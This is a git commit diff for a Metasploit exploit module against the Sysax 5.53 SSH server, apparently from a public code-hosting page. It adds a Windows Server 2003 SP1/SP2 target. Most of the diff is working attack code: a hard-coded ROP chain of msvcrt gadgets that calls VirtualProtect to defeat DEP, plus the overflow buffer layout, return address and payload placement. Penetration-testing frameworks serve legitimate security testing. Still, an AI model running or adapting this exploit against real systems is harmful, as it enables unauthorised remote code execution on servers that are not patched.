Add ROP target for Win2k3 SP1 and SP2
This commit is contained in:
parent
29cf8683ee
commit
4b1e67f94f
|
@ -47,9 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
# Win XP SP3 and Win2k3 SP0
|
[
|
||||||
# POP/POP/RET - sysaxservd.exe
|
'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
|
||||||
['Sysax 5.53 on Win XP SP3 / Win2k3 SP0', {'Ret'=>0x00402669}]
|
{
|
||||||
|
'Rop' => false,
|
||||||
|
'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[
|
||||||
|
'Sysax 5.53 on Win2K3 SP1/SP2',
|
||||||
|
{
|
||||||
|
'Rop' => true,
|
||||||
|
'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN
|
||||||
|
}
|
||||||
|
]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => "Feb 27 2012",
|
'DisclosureDate' => "Feb 27 2012",
|
||||||
|
@ -70,16 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def get_regular_exploit
|
||||||
#
|
|
||||||
# Load net/ssh so we can talk the SSH protocol
|
|
||||||
#
|
|
||||||
has_netssh = load_netssh
|
|
||||||
if not has_netssh
|
|
||||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Align the stack to the beginning of the fixed size payload
|
# Align the stack to the beginning of the fixed size payload
|
||||||
#
|
#
|
||||||
|
@ -115,6 +117,80 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
||||||
buf << [target.ret].pack('V*')
|
buf << [target.ret].pack('V*')
|
||||||
|
|
||||||
|
return buf
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_rop_exploit
|
||||||
|
|
||||||
|
junk = rand_text(4).unpack("L")[0].to_i
|
||||||
|
nop = make_nops(4).unpack("L")[0].to_i
|
||||||
|
|
||||||
|
# !mona rop -m msvcrt
|
||||||
|
p =
|
||||||
|
[
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x77ba1114, # <- *&VirtualProtect()
|
||||||
|
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
|
||||||
|
junk,
|
||||||
|
0x77bb0c86, # XCHG EAX,ESI # RETN
|
||||||
|
0x77bc9801, # POP EBP # RETN
|
||||||
|
0x77be2265, # ptr to 'push esp # ret'
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x03C0990F,
|
||||||
|
0x77bdd441, # SUB EAX, 03c0940f
|
||||||
|
0x77bb48d3, # POP EBX, RET
|
||||||
|
0x77bf21e0, # .data
|
||||||
|
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
|
||||||
|
0x77bbfc02, # POP ECX # RETN
|
||||||
|
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
|
||||||
|
0x77bd8c04, # POP EDI # RETN
|
||||||
|
0x77bd8c05, # ROP NOP (-> edi)
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x03c0984f,
|
||||||
|
0x77bdd441, # SUB EAX, 03c0940f
|
||||||
|
0x77bb8285, # XCHG EAX,EDX # RETN
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
nop,
|
||||||
|
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
|
||||||
|
].pack("V*")
|
||||||
|
|
||||||
|
p << payload.encoded
|
||||||
|
|
||||||
|
#
|
||||||
|
# Similar buffer structure to get_regular_exploit
|
||||||
|
#
|
||||||
|
buf = ''
|
||||||
|
buf << rand_text(392, payload_badchars)
|
||||||
|
buf << rand_text(20, payload_badchars)
|
||||||
|
buf << rand_text(1012, payload_badchars)
|
||||||
|
buf << p
|
||||||
|
buf << rand_text(9204-buf.length)
|
||||||
|
buf << rand_text(4, payload_badchars)
|
||||||
|
buf << [target.ret].pack('V*')
|
||||||
|
|
||||||
|
return buf
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
#
|
||||||
|
# Load net/ssh so we can talk the SSH protocol
|
||||||
|
#
|
||||||
|
has_netssh = load_netssh
|
||||||
|
if not has_netssh
|
||||||
|
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Create buffer based on target (DEP or no DEP)
|
||||||
|
# If possible, we still prefer to use the regular version because it's more stable
|
||||||
|
#
|
||||||
|
if target['Rop']
|
||||||
|
buf = get_rop_exploit
|
||||||
|
else
|
||||||
|
buf = get_regular_exploit
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Send the malicious buffer
|
# Send the malicious buffer
|
||||||
#
|
#
|
||||||
|
@ -149,6 +225,4 @@ end
|
||||||
=begin
|
=begin
|
||||||
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
||||||
relying on net/ssh.
|
relying on net/ssh.
|
||||||
|
|
||||||
* Need a reliable stack pivot to rop out, haven't found one
|
|
||||||
=end
|
=end
|
||||||
|
|
Loading…
Reference in New Issue